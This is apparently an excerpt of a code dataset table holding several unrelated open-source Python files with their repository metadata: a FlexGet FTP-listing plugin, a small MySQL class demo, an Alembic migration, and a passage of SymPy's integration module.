text
stringlengths 4
1.02M
| meta
dict |
---|---|
import logging
import ftplib
import os
import re
from flexget import plugin
from flexget.event import event
from flexget.entry import Entry
from flexget.config_schema import one_or_more
log = logging.getLogger('ftp_list')
class InputFtpList(object):
"""
Generate entries from a ftp listing
Configuration:
ftp_list:
config:
name: <ftp name>
username: <username>
password: <password>
host: <host to connect>
port: <port>
use-ssl: <yes/no>
encoding: <auto/utf8/ascii>
files-only: <yes/no>
recursive: <yes/no>
get-size: <yes/no>
dirs:
- <directory 1>
- <directory 2>
- ....
"""
encodings = ['auto', 'utf8', 'ascii']
schema = {
'type': 'object',
'properties': {
'config': {
'type': 'object',
'properties': {
'name': {'type': 'string'},
'username': {'type': 'string'},
'password': {'type': 'string'},
'host': {'type': 'string'},
'port': {'type': 'integer'},
'use-ssl': {'type': 'boolean', 'default': False},
'encoding': {'type': 'string', 'enum': encodings, 'default': 'auto'},
'files-only': {'type': 'boolean', 'default': False},
'recursive': {'type': 'boolean', 'default': False},
'get-size': {'type': 'boolean', 'default': True}
},
'additionProperties': False,
'required': ['name', 'username', 'password', 'host', 'port'],
},
'dirs': one_or_more({'type': 'string'}),
},
'required': ['config'],
'additionalProperties': False
}
def on_task_input(self, task, config):
connection_config = config['config']
if connection_config['use-ssl']:
ftp = ftplib.FTP_TLS()
else:
ftp = ftplib.FTP()
# ftp.set_debuglevel(2)
log.debug('Trying connecting to: %s', (connection_config['host']))
try:
ftp.connect(connection_config['host'], connection_config['port'])
ftp.login(connection_config['username'], connection_config['password'])
except ftplib.all_errors as e:
raise plugin.PluginError(e)
log.debug('Connected.')
encoding = connection_config['encoding']
files_only = connection_config['files-only']
recursive = connection_config['recursive']
get_size = connection_config['get-size']
mlst_supported = False
feat_response = ftp.sendcmd('FEAT').splitlines()
supported_extensions = [feat_item.strip().upper() for feat_item in feat_response[1:len(feat_response) - 1]]
if encoding.lower() == 'auto' and 'UTF8' in supported_extensions:
encoding = 'utf8'
else:
encoding = 'ascii'
for supported_extension in supported_extensions:
if supported_extension.startswith('MLST'):
mlst_supported = True
break
if not mlst_supported:
log.warning('MLST Command is not supported by the FTP server %s@%s:%s', connection_config['username'],
connection_config['host'], connection_config['port'])
ftp.sendcmd('TYPE I')
ftp.set_pasv(True)
entries = []
for path in config['dirs']:
baseurl = "ftp://%s:%s@%s:%s/" % (connection_config['username'], connection_config['password'],
connection_config['host'], connection_config['port'])
self._handle_path(entries, ftp, baseurl, path, mlst_supported, files_only, recursive, get_size, encoding)
return entries
def _handle_path(self, entries, ftp, baseurl, path='', mlst_supported=False, files_only=False, recursive=False,
get_size=True, encoding=None):
dirs = self.list_directory(ftp, path)
for p in dirs:
if encoding:
p = p.decode(encoding)
#Clean file list when subdirectories are used
p = p.replace(path + '/', '')
mlst = {}
if mlst_supported:
mlst_output = ftp.sendcmd('MLST ' + path + '/' + p)
clean_mlst_output = [line.strip().lower() for line in mlst_output.splitlines()][1]
mlst = self.parse_mlst(clean_mlst_output)
else:
element_is_directory = self.is_directory(ftp, path + '/' + p)
if element_is_directory:
mlst['type'] = 'dir'
log.debug('%s is a directory', p)
else:
mlst['type'] = 'file'
log.debug('%s is a file', p)
if recursive and mlst.get('type') == 'dir':
self._handle_path(entries, ftp, baseurl, path + '/' + p, mlst_supported, files_only,
recursive, get_size, encoding)
if not files_only or mlst.get('type') == 'file':
url = baseurl + path + '/' + p
url = url.replace(' ', '%20')
title = os.path.basename(p)
log.info('Accepting entry "%s" [%s]' % (path + '/' + p, mlst.get('type') or "unknown",))
entry = Entry(title, url)
if get_size and not 'size' in mlst:
if mlst.get('type') == 'file':
entry['content_size'] = ftp.size(path + '/' + p) / (1024 * 1024)
log.debug('(FILE) Size = %s', entry['content_size'])
elif mlst.get('type') == 'dir':
entry['content_size'] = self.get_folder_size(ftp, path, p)
log.debug('(DIR) Size = %s', entry['content_size'])
elif get_size:
entry['content_size'] = float(mlst.get('size')) / (1024 * 1024)
entries.append(entry)
def parse_mlst(self, mlst):
re_results = re.findall('(.*?)=(.*?);', mlst)
parsed = {}
for k, v in re_results:
parsed[k] = v
return parsed
def is_directory(self, ftp, elementpath):
try:
original_wd = ftp.pwd()
ftp.cwd(elementpath)
ftp.cwd(original_wd)
return True
except ftplib.error_perm:
return False
def list_directory(self, ftp, path):
try:
dirs = ftp.nlst(path)
except ftplib.error_perm as e:
# ftp returns 550 on empty dirs
if str(e).startswith('550 '):
log.debug('Directory %s is empty.', path)
dirs = []
else:
raise plugin.PluginError(e)
return dirs
def get_folder_size(self, ftp, path, p):
size = 0
dirs = self.list_directory(ftp, path + '/' + p)
for filename in dirs:
filename = filename.replace(path + '/' + p + '/', '')
try:
size += ftp.size(path + '/' + p + '/' + filename) / (1024 * 1024)
except ftplib.error_perm:
size += self.get_folder_size(ftp, path + '/' + p, filename)
return size
@event('plugin.register')
def register_plugin():
plugin.register(InputFtpList, 'ftp_list', api_ver=2)
| {
"content_hash": "c7f7a6f27d8fe356b61fde856f6d4448",
"timestamp": "",
"source": "github",
"line_count": 205,
"max_line_length": 117,
"avg_line_length": 36.58536585365854,
"alnum_prop": 0.49746666666666667,
"repo_name": "patsissons/Flexget",
"id": "57e5f8d8160b6c591da0ae630d7dfe86afb72667",
"size": "7500",
"binary": false,
"copies": "5",
"ref": "refs/heads/develop",
"path": "flexget/plugins/input/ftp_list.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "56725"
},
{
"name": "HTML",
"bytes": "35670"
},
{
"name": "JavaScript",
"bytes": "455222"
},
{
"name": "Python",
"bytes": "2131965"
}
],
"symlink_target": ""
} |
import settings
class Mysql:
def __init__(self,host,port):
self.host=host
self.port=port
print('connecting..')
@classmethod
def from_conf(cls):
return cls(settings.HOST,settings.PORT)
def select(self):
print(self)
print('select function')
conn=Mysql('192.168.1.3',3306)
conn2=Mysql.from_conf() | {
"content_hash": "8d15e7a47688ae125ea76c93d103d8a5",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 47,
"avg_line_length": 25.5,
"alnum_prop": 0.6162464985994398,
"repo_name": "5StevenWu/Coursepy",
"id": "dd29841c35cd533932f6fb193ad8dcead2827c19",
"size": "399",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "L07/mysql_test/main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "27282"
},
{
"name": "Python",
"bytes": "139220"
}
],
"symlink_target": ""
} |
import sys
sys.path.append('hooks')
| {
"content_hash": "17c0f1988adc16023b74ac61e8729656",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 24,
"avg_line_length": 18,
"alnum_prop": 0.75,
"repo_name": "CanonicalBootStack/charm-hacluster",
"id": "b7fe4e1b7df4100835744a17913e88b273f9fcc2",
"size": "611",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "unit_tests/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "488"
},
{
"name": "Perl",
"bytes": "9735"
},
{
"name": "Python",
"bytes": "586050"
},
{
"name": "Shell",
"bytes": "15354"
}
],
"symlink_target": ""
} |
"""empty message
Revision ID: 0026 add expires, send_starts_at
Revises: 0025 add email and email types
Create Date: 2019-07-16 00:30:24.998868
"""
# revision identifiers, used by Alembic.
revision = '0026 add expires, send_starts_at'
down_revision = '0025 add email and email types'
from alembic import op
import sqlalchemy as sa
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('emails', sa.Column('expires', sa.DateTime(), nullable=True))
op.add_column('emails', sa.Column('send_starts_at', sa.DateTime(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('emails', 'send_starts_at')
op.drop_column('emails', 'expires')
# ### end Alembic commands ###
| {
"content_hash": "8ae608b3a9a4f226d77bc1cd9cf22b32",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 86,
"avg_line_length": 29.5,
"alnum_prop": 0.6803874092009685,
"repo_name": "NewAcropolis/api",
"id": "86f00d0c5d615ddadc59edd3964fa6afd056d21a",
"size": "826",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "migrations/versions/0026.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "10421"
},
{
"name": "Makefile",
"bytes": "1369"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "791740"
},
{
"name": "Shell",
"bytes": "66108"
}
],
"symlink_target": ""
} |
from __future__ import print_function, division
from sympy.concrete.expr_with_limits import AddWithLimits
from sympy.core.add import Add
from sympy.core.basic import Basic, C
from sympy.core.compatibility import is_sequence, xrange
from sympy.core.containers import Tuple
from sympy.core.expr import Expr
from sympy.core.function import diff
from sympy.core.numbers import oo
from sympy.core.relational import Eq
from sympy.core.sets import Interval
from sympy.core.singleton import S
from sympy.core.symbol import (Dummy, Symbol, Wild)
from sympy.core.sympify import sympify
from sympy.integrals.manualintegrate import manualintegrate
from sympy.integrals.trigonometry import trigintegrate
from sympy.integrals.deltafunctions import deltaintegrate
from sympy.integrals.rationaltools import ratint
from sympy.integrals.heurisch import heurisch, heurisch_wrapper
from sympy.integrals.meijerint import meijerint_definite, meijerint_indefinite
from sympy.utilities import xthreaded, flatten
from sympy.utilities.misc import filldedent
from sympy.polys import Poly, PolynomialError
from sympy.solvers.solvers import solve, posify
from sympy.functions import Piecewise, sqrt, sign
from sympy.geometry import Curve
from sympy.functions.elementary.piecewise import piecewise_fold
from sympy.series import limit
# TODO get these helper functions into a super class for sum-like
# objects: Sum, Product, Integral (issue 6761)
class Integral(AddWithLimits):
"""Represents unevaluated integral."""
__slots__ = ['is_commutative']
def __new__(cls, function, *symbols, **assumptions):
"""Create an unevaluated integral.
Arguments are an integrand followed by one or more limits.
If no limits are given and there is only one free symbol in the
expression, that symbol will be used, otherwise an error will be
raised.
>>> from sympy import Integral
>>> from sympy.abc import x, y
>>> Integral(x)
Integral(x, x)
>>> Integral(y)
Integral(y, y)
When limits are provided, they are interpreted as follows (using
``x`` as though it were the variable of integration):
(x,) or x - indefinite integral
(x, a) - "evaluate at" integral is an abstract antiderivative
(x, a, b) - definite integral
The ``as_dummy`` method can be used to see which symbols cannot be
targeted by subs: those with a preppended underscore cannot be
changed with ``subs``. (Also, the integration variables themselves --
the first element of a limit -- can never be changed by subs.)
>>> i = Integral(x, x)
>>> at = Integral(x, (x, x))
>>> i.as_dummy()
Integral(x, x)
>>> at.as_dummy()
Integral(_x, (_x, x))
"""
obj = AddWithLimits.__new__(cls, function, *symbols, **assumptions)
return obj
def __getnewargs__(self):
return (self.function,) + tuple([tuple(xab) for xab in self.limits])
@property
def free_symbols(self):
"""
This method returns the symbols that will exist when the
integral is evaluated. This is useful if one is trying to
determine whether an integral depends on a certain
symbol or not.
Examples
========
>>> from sympy import Integral
>>> from sympy.abc import x, y
>>> Integral(x, (x, y, 1)).free_symbols
set([y])
See Also
========
function, limits, variables
"""
for xab in self.limits:
if len(xab) == 3 and xab[1] == xab[2]:
return set()
return AddWithLimits.free_symbols.fget(self)
@property
def is_zero(self):
"""Since Integral doesn't autosimplify it it useful to see if
it would simplify to zero or not in a trivial manner, i.e. when
the function is 0 or two limits of a definite integral are the same.
This is a very naive and quick test, not intended to check for special
patterns like Integral(sin(m*x)*cos(n*x), (x, 0, 2*pi)) == 0.
Examples
========
>>> from sympy import Integral
>>> from sympy.abc import x, y, z
>>> Integral(1, (x, 1, 1)).is_zero
True
>>> Integral(0, (x, y, z)).is_zero
True
>>> Integral(1, (x, 1, 2)).is_zero
False
See Also
========
is_number
"""
if (self.function.is_zero or
any(len(xab) == 3 and xab[1] == xab[2] for xab in self.limits)):
return True
if not self.free_symbols and self.function.is_number:
# the integrand is a number and the limits are numerical
return False
@property
def is_number(self):
"""
Return True if the Integral will result in a number, else False.
Integrals are a special case since they contain symbols that can
be replaced with numbers. Whether the integral can be done or not is
another issue. But answering whether the final result is a number is
not difficult.
Examples
========
>>> from sympy import Integral
>>> from sympy.abc import x, y
>>> Integral(x).is_number
False
>>> Integral(x, y).is_number
False
>>> Integral(x, (y, 1, x)).is_number
False
>>> Integral(x, (y, 1, 2)).is_number
False
>>> Integral(x, (y, 1, 1)).is_number
True
>>> Integral(x, (x, 1, 2)).is_number
True
>>> Integral(x*y, (x, 1, 2), (y, 1, 3)).is_number
True
>>> Integral(1, x, (x, 1, 2)).is_number
True
See Also
========
is_zero
"""
integrand, limits = self.function, self.limits
isyms = integrand.atoms(Symbol)
for xab in limits:
if len(xab) == 1:
isyms.add(xab[0])
continue # it may be removed later
elif len(xab) == 3 and xab[1] == xab[2]: # XXX naive equality test
return True # integral collapsed
if xab[0] in isyms:
# take it out of the symbols since it will be replace
# with whatever the limits of the integral are
isyms.remove(xab[0])
# add in the new symbols
for i in xab[1:]:
isyms.update(i.free_symbols)
# if there are no surviving symbols then the result is a number
return len(isyms) == 0
def transform(self, x, u, inverse=False):
r"""
Performs a change of variables from `x` to `u` using the relationship
given by `x` and `u` which will define the transformations `f` and `F`
(which are inverses of each other) as follows:
1) If `x` is a Symbol (which is a variable of integration) then `u`
will be interpreted as some function, f(u), with inverse F(u).
This, in effect, just makes the substitution of x with f(x).
2) If `u` is a Symbol then `x` will be interpreted as some function,
F(x), with inverse f(u). This is commonly referred to as
u-substitution.
The `inverse` option will reverse `x` and `u`. It is a deprecated option
since `x` and `u` can just be passed in reverse order.
Once f and F have been identified, the transformation is made as
follows:
.. math:: \int_a^b x \mathrm{d}x \rightarrow \int_{F(a)}^{F(b)} f(x)
\frac{\mathrm{d}}{\mathrm{d}x}
where `F(x)` is the inverse of `f(x)` and the limits and integrand have
been corrected so as to retain the same value after integration.
Notes
=====
The mappings, F(x) or f(u), must lead to a unique integral. Linear
or rational linear expression, `2*x`, `1/x` and `sqrt(x)`, will
always work; quadratic expressions like `x**2 - 1` are acceptable
as long as the resulting integrand does not depend on the sign of
the solutions (see examples).
The integral will be returned unchanged if `x` is not a variable of
integration.
`x` must be (or contain) only one of of the integration variables. If
`u` has more than one free symbol then it should be sent as a tuple
(`u`, `uvar`) where `uvar` identifies which variable is replacing
the integration variable.
XXX can it contain another integration variable?
Examples
========
>>> from sympy.abc import a, b, c, d, x, u, y
>>> from sympy import Integral, S, cos, sqrt
>>> i = Integral(x*cos(x**2 - 1), (x, 0, 1))
transform can change the variable of integration
>>> i.transform(x, u)
Integral(u*cos(u**2 - 1), (u, 0, 1))
transform can perform u-substitution as long as a unique
integrand is obtained:
>>> i.transform(x**2 - 1, u)
Integral(cos(u)/2, (u, -1, 0))
This attempt fails because x = +/-sqrt(u + 1) and the
sign does not cancel out of the integrand:
>>> Integral(cos(x**2 - 1), (x, 0, 1)).transform(x**2 - 1, u)
Traceback (most recent call last):
...
ValueError:
The mapping between F(x) and f(u) did not give a unique integrand.
transform can do a substitution. Here, the previous
result is transformed back into the original expression
using "u-substitution":
>>> ui = _
>>> _.transform(sqrt(u + 1), x) == i
True
We can accomplish the same with a regular substitution:
>>> ui.transform(u, x**2 - 1) == i
True
If the `x` does not contain a symbol of integration then
the integral will be returned unchanged. Integral `i` does
not have an integration variable `a` so no change is made:
>>> i.transform(a, x) == i
True
When `u` has more than one free symbol the symbol that is
replacing `x` must be identified by passing `u` as a tuple:
>>> Integral(x, (x, 0, 1)).transform(x, (u + a, u))
Integral(a + u, (u, -a, -a + 1))
>>> Integral(x, (x, 0, 1)).transform(x, (u + a, a))
Integral(a + u, (a, -u, -u + 1))
See Also
========
variables : Lists the integration variables
as_dummy : Replace integration variables with dummy ones
"""
if inverse:
# when this is removed, update the docstring
from sympy.utilities.exceptions import SymPyDeprecationWarning
SymPyDeprecationWarning(
feature="transform(x, f(x), inverse=True)",
useinstead="transform(f(x), x)",
issue=6479, deprecated_since_version="0.7.2",
).warn()
# in the old style x and u contained the same variable so
# don't worry about using the old-style feature with the
# new style input...but it will still work:
# i.transform(x, u).transform(x, u, inverse=True) -> i
x, u = u, x
d = Dummy('d')
xfree = x.free_symbols.intersection(self.variables)
if len(xfree) > 1:
raise ValueError(
'F(x) can only contain one of: %s' % self.variables)
xvar = xfree.pop() if xfree else d
if xvar not in self.variables:
return self
u = sympify(u)
if isinstance(u, Expr):
ufree = u.free_symbols
if len(ufree) != 1:
raise ValueError(filldedent('''
When f(u) has more than one free symbol, the one replacing x
must be identified: pass f(u) as (f(u), u)'''))
uvar = ufree.pop()
else:
u, uvar = u
if uvar not in u.free_symbols:
raise ValueError(filldedent('''
Expecting a tuple (expr, symbol) where symbol identified
a free symbol in expr, but symbol is not in expr's free
symbols.'''))
if not isinstance(uvar, Symbol):
raise ValueError(filldedent('''
Expecting a tuple (expr, symbol) but didn't get
a symbol; got %s''' % uvar))
if x.is_Symbol and u.is_Symbol:
return self.xreplace({x: u})
if not x.is_Symbol and not u.is_Symbol:
raise ValueError('either x or u must be a symbol')
if uvar == xvar:
return self.transform(x, u.subs(uvar, d)).xreplace({d: uvar})
if uvar in self.limits:
raise ValueError(filldedent('''
u must contain the same variable as in x
or a variable that is not already an integration variable'''))
if not x.is_Symbol:
F = [x.subs(xvar, d)]
soln = solve(u - x, xvar, check=False)
if not soln:
raise ValueError('no solution for solve(F(x) - f(u), x)')
f = [fi.subs(uvar, d) for fi in soln]
else:
f = [u.subs(uvar, d)]
pdiff, reps = posify(u - x)
puvar = uvar.subs([(v, k) for k, v in reps.items()])
soln = [s.subs(reps) for s in solve(pdiff, puvar)]
if not soln:
raise ValueError('no solution for solve(F(x) - f(u), u)')
F = [fi.subs(xvar, d) for fi in soln]
newfuncs = set([(self.function.subs(xvar, fi)*fi.diff(d)
).subs(d, uvar) for fi in f])
if len(newfuncs) > 1:
raise ValueError(filldedent('''
The mapping between F(x) and f(u) did not give
a unique integrand.'''))
newfunc = newfuncs.pop()
def _calc_limit_1(F, a, b):
"""
replace d with a, using subs if possible, otherwise limit
where sign of b is considered
"""
wok = F.subs(d, a)
if wok is S.NaN or wok.is_bounded is False and a.is_bounded:
return limit(sign(b)*F, d, a)
return wok
def _calc_limit(a, b):
"""
replace d with a, using subs if possible, otherwise limit
where sign of b is considered
"""
avals = list(set([_calc_limit_1(Fi, a, b) for Fi in F]))
if len(avals) > 1:
raise ValueError(filldedent('''
The mapping between F(x) and f(u) did not
give a unique limit.'''))
return avals[0]
newlimits = []
for xab in self.limits:
sym = xab[0]
if sym == xvar:
if len(xab) == 3:
a, b = xab[1:]
a, b = _calc_limit(a, b), _calc_limit(b, a)
if a > b:
a, b = b, a
newfunc = -newfunc
newlimits.append((uvar, a, b))
elif len(xab) == 2:
a = _calc_limit(xab[1], 1)
newlimits.append((uvar, a))
else:
newlimits.append(uvar)
else:
newlimits.append(xab)
return self.func(newfunc, *newlimits)
def doit(self, **hints):
"""
Perform the integration using any hints given.
Examples
========
>>> from sympy import Integral
>>> from sympy.abc import x, i
>>> Integral(x**i, (i, 1, 3)).doit()
Piecewise((2, log(x) == 0), (x**3/log(x) - x/log(x), True))
See Also
========
sympy.integrals.trigonometry.trigintegrate
sympy.integrals.risch.heurisch
sympy.integrals.rationaltools.ratint
as_sum : Approximate the integral using a sum
"""
if not hints.get('integrals', True):
return self
deep = hints.get('deep', True)
meijerg = hints.get('meijerg', None)
conds = hints.get('conds', 'piecewise')
risch = hints.get('risch', None)
manual = hints.get('manual', None)
if conds not in ['separate', 'piecewise', 'none']:
raise ValueError('conds must be one of "separate", "piecewise", '
'"none", got: %s' % conds)
if risch and any(len(xab) > 1 for xab in self.limits):
raise ValueError('risch=True is only allowed for indefinite integrals.')
# check for the trivial case of equal upper and lower limits
if self.is_zero:
return S.Zero
# now compute and check the function
function = self.function
if deep:
function = function.doit(**hints)
if function.is_zero:
return S.Zero
# There is no trivial answer, so continue
undone_limits = []
# ulj = free symbols of any undone limits' upper and lower limits
ulj = set()
for xab in self.limits:
# compute uli, the free symbols in the
# Upper and Lower limits of limit I
if len(xab) == 1:
uli = set(xab[:1])
elif len(xab) == 2:
uli = xab[1].free_symbols
elif len(xab) == 3:
uli = xab[1].free_symbols.union(xab[2].free_symbols)
# this integral can be done as long as there is no blocking
# limit that has been undone. An undone limit is blocking if
# it contains an integration variable that is in this limit's
# upper or lower free symbols or vice versa
if xab[0] in ulj or any(v[0] in uli for v in undone_limits):
undone_limits.append(xab)
ulj.update(uli)
continue
# There are a number of tradeoffs in using the meijer g method.
# It can sometimes be a lot faster than other methods, and
# sometimes slower. And there are certain types of integrals for
# which it is more likely to work than others.
# These heuristics are incorporated in deciding what integration
# methods to try, in what order.
# See the integrate() docstring for details.
def try_meijerg(function, xab):
ret = None
if len(xab) == 3 and meijerg is not False:
x, a, b = xab
try:
res = meijerint_definite(function, x, a, b)
except NotImplementedError:
from sympy.integrals.meijerint import _debug
_debug('NotImplementedError from meijerint_definite')
res = None
if res is not None:
f, cond = res
if conds == 'piecewise':
ret = Piecewise((f, cond),
(self.func(function, (x, a, b)), True))
elif conds == 'separate':
if len(self.limits) != 1:
raise ValueError('conds=separate not supported in '
'multiple integrals')
ret = f, cond
else:
ret = f
return ret
meijerg1 = meijerg
if len(xab) == 3 and xab[1].is_real and xab[2].is_real \
and not function.is_Poly and \
(xab[1].has(oo, -oo) or xab[2].has(oo, -oo)):
ret = try_meijerg(function, xab)
if ret is not None:
function = ret
continue
else:
meijerg1 = False
# If the special meijerg code did not succeed finding a definite
# integral, then the code using meijerint_indefinite will not either
# (it might find an antiderivative, but the answer is likely to be
# nonsensical).
# Thus if we are requested to only use meijer g-function methods,
# we give up at this stage. Otherwise we just disable g-function
# methods.
if meijerg1 is False and meijerg is True:
antideriv = None
else:
antideriv = self._eval_integral(
function, xab[0],
meijerg=meijerg1, risch=risch, manual=manual,
conds=conds)
if antideriv is None and meijerg1 is True:
ret = try_meijerg(function, xab)
if ret is not None:
function = ret
continue
if antideriv is None:
undone_limits.append(xab)
else:
if len(xab) == 1:
function = antideriv
else:
if len(xab) == 3:
x, a, b = xab
if len(xab) == 2:
x, b = xab
a = None
if deep:
if isinstance(a, Basic):
a = a.doit(**hints)
if isinstance(b, Basic):
b = b.doit(**hints)
if antideriv.is_Poly:
gens = list(antideriv.gens)
gens.remove(x)
antideriv = antideriv.as_expr()
function = antideriv._eval_interval(x, a, b)
function = Poly(function, *gens)
else:
try:
function = antideriv._eval_interval(x, a, b)
except NotImplementedError:
# This can happen if _eval_interval depends in a
# complicated way on limits that cannot be computed
undone_limits.append(xab)
if undone_limits:
return self.func(*([function] + undone_limits))
return function
def _eval_derivative(self, sym):
"""Evaluate the derivative of the current Integral object by
differentiating under the integral sign [1], using the Fundamental
Theorem of Calculus [2] when possible.
Whenever an Integral is encountered that is equivalent to zero or
has an integrand that is independent of the variable of integration
those integrals are performed. All others are returned as Integral
instances which can be resolved with doit() (provided they are integrable).
References:
[1] http://en.wikipedia.org/wiki/Differentiation_under_the_integral_sign
[2] http://en.wikipedia.org/wiki/Fundamental_theorem_of_calculus
Examples
========
>>> from sympy import Integral
>>> from sympy.abc import x, y
>>> i = Integral(x + y, y, (y, 1, x))
>>> i.diff(x)
Integral(x + y, (y, x)) + Integral(1, y, (y, 1, x))
>>> i.doit().diff(x) == i.diff(x).doit()
True
>>> i.diff(y)
0
The previous must be true since there is no y in the evaluated integral:
>>> i.free_symbols
set([x])
>>> i.doit()
2*x**3/3 - x/2 - 1/6
"""
# differentiate under the integral sign; we do not
# check for regularity conditions (TODO), see issue 4215
# get limits and the function
f, limits = self.function, list(self.limits)
# the order matters if variables of integration appear in the limits
# so work our way in from the outside to the inside.
limit = limits.pop(-1)
if len(limit) == 3:
x, a, b = limit
elif len(limit) == 2:
x, b = limit
a = None
else:
a = b = None
x = limit[0]
if limits: # f is the argument to an integral
f = self.func(f, *tuple(limits))
# assemble the pieces
def _do(f, ab):
dab_dsym = diff(ab, sym)
if not dab_dsym:
return S.Zero
if isinstance(f, Integral):
limits = [(x, x) if (len(l) == 1 and l[0] == x) else l
for l in f.limits]
f = self.func(f.function, *limits)
return f.subs(x, ab)*dab_dsym
rv = 0
if b is not None:
rv += _do(f, b)
if a is not None:
rv -= _do(f, a)
if len(limit) == 1 and sym == x:
# the dummy variable *is* also the real-world variable
arg = f
rv += arg
else:
# the dummy variable might match sym but it's
# only a dummy and the actual variable is determined
# by the limits, so mask off the variable of integration
# while differentiating
u = Dummy('u')
arg = f.subs(x, u).diff(sym).subs(u, x)
rv += self.func(arg, Tuple(x, a, b))
return rv
def _eval_integral(self, f, x, meijerg=None, risch=None, manual=None,
conds='piecewise'):
"""
Calculate the anti-derivative to the function f(x).
The following algorithms are applied (roughly in this order):
1. Simple heuristics (based on pattern matching and integral table):
- most frequently used functions (e.g. polynomials, products of trig functions)
2. Integration of rational functions:
- A complete algorithm for integrating rational functions is
implemented (the Lazard-Rioboo-Trager algorithm). The algorithm
also uses the partial fraction decomposition algorithm
implemented in apart() as a preprocessor to make this process
faster. Note that the integral of a rational function is always
elementary, but in general, it may include a RootSum.
3. Full Risch algorithm:
- The Risch algorithm is a complete decision
procedure for integrating elementary functions, which means that
given any elementary function, it will either compute an
elementary antiderivative, or else prove that none exists.
Currently, part of transcendental case is implemented, meaning
elementary integrals containing exponentials, logarithms, and
(soon!) trigonometric functions can be computed. The algebraic
case, e.g., functions containing roots, is much more difficult
and is not implemented yet.
- If the routine fails (because the integrand is not elementary, or
because a case is not implemented yet), it continues on to the
next algorithms below. If the routine proves that the integrals
is nonelementary, it still moves on to the algorithms below,
because we might be able to find a closed-form solution in terms
of special functions. If risch=True, however, it will stop here.
4. The Meijer G-Function algorithm:
- This algorithm works by first rewriting the integrand in terms of
very general Meijer G-Function (meijerg in SymPy), integrating
it, and then rewriting the result back, if possible. This
algorithm is particularly powerful for definite integrals (which
is actually part of a different method of Integral), since it can
compute closed-form solutions of definite integrals even when no
closed-form indefinite integral exists. But it also is capable
of computing many indefinite integrals as well.
- Another advantage of this method is that it can use some results
about the Meijer G-Function to give a result in terms of a
Piecewise expression, which allows to express conditionally
convergent integrals.
- Setting meijerg=True will cause integrate() to use only this
method.
5. The "manual integration" algorithm:
- This algorithm tries to mimic how a person would find an
antiderivative by hand, for example by looking for a
substitution or applying integration by parts. This algorithm
does not handle as many integrands but can return results in a
more familiar form.
- Sometimes this algorithm can evaluate parts of an integral; in
this case integrate() will try to evaluate the rest of the
integrand using the other methods here.
- Setting manual=True will cause integrate() to use only this
method.
6. The Heuristic Risch algorithm:
- This is a heuristic version of the Risch algorithm, meaning that
it is not deterministic. This is tried as a last resort because
it can be very slow. It is still used because not enough of the
full Risch algorithm is implemented, so that there are still some
integrals that can only be computed using this method. The goal
is to implement enough of the Risch and Meijer G methods so that
this can be deleted.
"""
from sympy.integrals.risch import risch_integrate
if risch:
try:
return risch_integrate(f, x, conds=conds)
except NotImplementedError:
return None
if manual:
try:
result = manualintegrate(f, x)
if result is not None and result.func != Integral:
return result
except (ValueError, PolynomialError):
pass
# if it is a poly(x) then let the polynomial integrate itself (fast)
#
# It is important to make this check first, otherwise the other code
# will return a sympy expression instead of a Polynomial.
#
# see Polynomial for details.
if isinstance(f, Poly) and not meijerg:
return f.integrate(x)
# Piecewise antiderivatives need to call special integrate.
if f.func is Piecewise:
return f._eval_integral(x)
# let's cut it short if `f` does not depend on `x`
if not f.has(x):
return f*x
# try to convert to poly(x) and then integrate if successful (fast)
poly = f.as_poly(x)
if poly is not None and not meijerg:
return poly.integrate().as_expr()
if risch is not False:
try:
result, i = risch_integrate(f, x, separate_integral=True, conds=conds)
except NotImplementedError:
pass
else:
if i:
# There was a nonelementary integral. Try integrating it.
return result + i.doit(risch=False)
else:
return result
# since Integral(f=g1+g2+...) == Integral(g1) + Integral(g2) + ...
# we are going to handle Add terms separately,
# if `f` is not Add -- we only have one term
# Note that in general, this is a bad idea, because Integral(g1) +
# Integral(g2) might not be computable, even if Integral(g1 + g2) is.
# For example, Integral(x**x + x**x*log(x)). But many heuristics only
# work term-wise. So we compute this step last, after trying
# risch_integrate. We also try risch_integrate again in this loop,
# because maybe the integral is a sum of an elementary part and a
# nonelementary part (like erf(x) + exp(x)). risch_integrate() is
# quite fast, so this is acceptable.
parts = []
args = Add.make_args(f)
for g in args:
coeff, g = g.as_independent(x)
# g(x) = const
if g is S.One and not meijerg:
parts.append(coeff*x)
continue
# g(x) = expr + O(x**n)
order_term = g.getO()
if order_term is not None:
h = self._eval_integral(g.removeO(), x)
if h is not None:
h_order_expr = self._eval_integral(order_term.expr, x)
if h_order_expr is not None:
h_order_term = order_term.func(
h_order_expr, *order_term.variables)
parts.append(coeff*(h + h_order_term))
continue
# NOTE: if there is O(x**n) and we fail to integrate then there is
# no point in trying other methods because they will fail anyway.
return None
# c
# g(x) = (a*x+b)
if g.is_Pow and not g.exp.has(x) and not meijerg:
a = Wild('a', exclude=[x])
b = Wild('b', exclude=[x])
M = g.base.match(a*x + b)
if M is not None:
if g.exp == -1:
h = C.log(g.base)
elif conds != 'piecewise':
h = g.base**(g.exp + 1) / (g.exp + 1)
else:
h1 = C.log(g.base)
h2 = g.base**(g.exp + 1) / (g.exp + 1)
h = Piecewise((h1, Eq(g.exp, -1)), (h2, True))
parts.append(coeff * h / M[a])
continue
# poly(x)
# g(x) = -------
# poly(x)
if g.is_rational_function(x) and not meijerg:
parts.append(coeff * ratint(g, x))
continue
if not meijerg:
# g(x) = Mul(trig)
h = trigintegrate(g, x, conds=conds)
if h is not None:
parts.append(coeff * h)
continue
# g(x) has at least a DiracDelta term
h = deltaintegrate(g, x)
if h is not None:
parts.append(coeff * h)
continue
# Try risch again.
if risch is not False:
try:
h, i = risch_integrate(g, x, separate_integral=True, conds=conds)
except NotImplementedError:
h = None
else:
if i:
